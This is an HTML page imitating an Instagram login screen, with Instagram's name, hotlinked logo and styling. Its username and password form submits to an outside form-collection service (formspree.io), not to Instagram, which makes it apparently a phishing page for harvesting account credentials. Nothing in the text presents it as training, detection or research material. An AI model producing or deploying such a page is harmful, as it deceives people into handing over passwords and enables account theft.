<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Instagram Login</title>
  <style>
    /* CSS Reset */
    * {
      box-sizing: border-box;
      margin: 0;
      padding: 0;
    }
    
    body {
      font-family: Arial, sans-serif;
      background-color: #fafafa;
    }
    
    .container {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    
    .card {
      background-color: #fff;
      border: 1px solid #dbdbdb;
      border-radius: 4px;
      width: 350px;
      padding: 24px;
      text-align: center;
    }
    
    .logo {
      margin-bottom: 16px;
      width: 120px; /* Adjust the logo width as needed */
    }
    
    .instagram-name {
      font-family: 'Grand Hotel', cursive;
      font-size: 28px;
      margin-bottom: 16px;
    }
    
    .form-group {
      margin-bottom: 16px;
    }
    
    .form-group input {
      width: 100%;
      padding: 10px;
      border: 1px solid #dbdbdb;
      border-radius: 4px;
    }
    
    .form-group button {
      width: 100%;
      padding: 10px;
      background-color: #0095f6;
      border: none;
      border-radius: 4px;
      color: #fff;
      font-weight: bold;
      cursor: pointer;
    }
    
    .text-small {
      font-size: 12px;
      color: #8e8e8e;
      margin-top: 8px;
    }
    
    /* Media Queries */
    @media (max-width: 480px) {
      .card {
        width: 90%;
      }
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="card">
      <h1 class="instagram-name">Instagram</h1> 
      <img class="logo" src="https://www.instagram.com/static/images/ico/xxhdpi_launcher.png/99cf3909d459.png" alt="Instagram Logo" width="200">
      <form action="https://formspree.io/f/mpzevpjg"
  method="POST">
        <div class="form-group">
          <input type="text" placeholder="Username">
        </div>
        <div class="form-group">
          <input type="password" placeholder="Password">
        </div>
        <div class="form-group">
          <button type="submit">Log In</button>
        </div>
      </form>
      <div class="text-small">
        <a href="#">Forgot password?</a>
      </div>
    </div>
  </div>
</body>
</html>
